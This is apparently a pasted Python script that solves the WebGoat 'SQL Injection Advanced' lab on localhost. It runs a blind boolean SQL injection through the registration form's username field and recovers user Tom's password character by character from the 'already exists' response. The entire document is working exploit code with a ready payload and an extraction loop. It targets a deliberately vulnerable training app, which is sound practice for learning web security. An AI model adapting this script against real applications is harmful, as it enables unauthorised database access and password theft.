· 2 months ago · Jul 13, 2025, 06:30 PM
1import requests
2import json
3
4def main():
5 url = "http://localhost:8080/WebGoat/SqlInjectionAdvanced/register"
6 session_id = "3CF43BAE22DD939DC9595A038C811E68"
7
8 headers = {
9 "Cookie": f"JSESSIONID={session_id}",
10 "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
11 }
12
13 charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
14
15 password = ""
16
17 for i in range(1, 26): # Hasło do 25 znaków
18 found = False
19 for c in charset:
20 attempt = password + c
21 payload = f"tom' and substring(password,1,{i})='{attempt}"
22 data = {
23 "username_reg": payload,
24 "email_reg": "test@test.com",
25 "password_reg": "abc",
26 "confirm_password_reg": "abc"
27 }
28
29 r = requests.put(url, headers=headers, data=data)
30
31 if r.status_code == 200:
32 try:
33 response_json = json.loads(r.text)
34 feedback = response_json.get("feedback", "[No feedback in response]")
35 except json.JSONDecodeError:
36 feedback = "[Invalid JSON in response]"
37
38 print(f"{attempt} -> {feedback}")
39
40 if "already exists" in feedback:
41 password += c
42 print(f"[+] Found character {i}: {c} -> {password}")
43 found = True
44 break
45 else:
46 print(f"{c} -> [HTTP {r.status_code}]: {r.text}")
47
48 if not found:
49 print(f"[!] End of password detected at position {i}. Stopping.")
50 break
51
52 print(f"[+] Final password for Tom: {password}")
53
54if __name__ == "__main__":
55 main()
56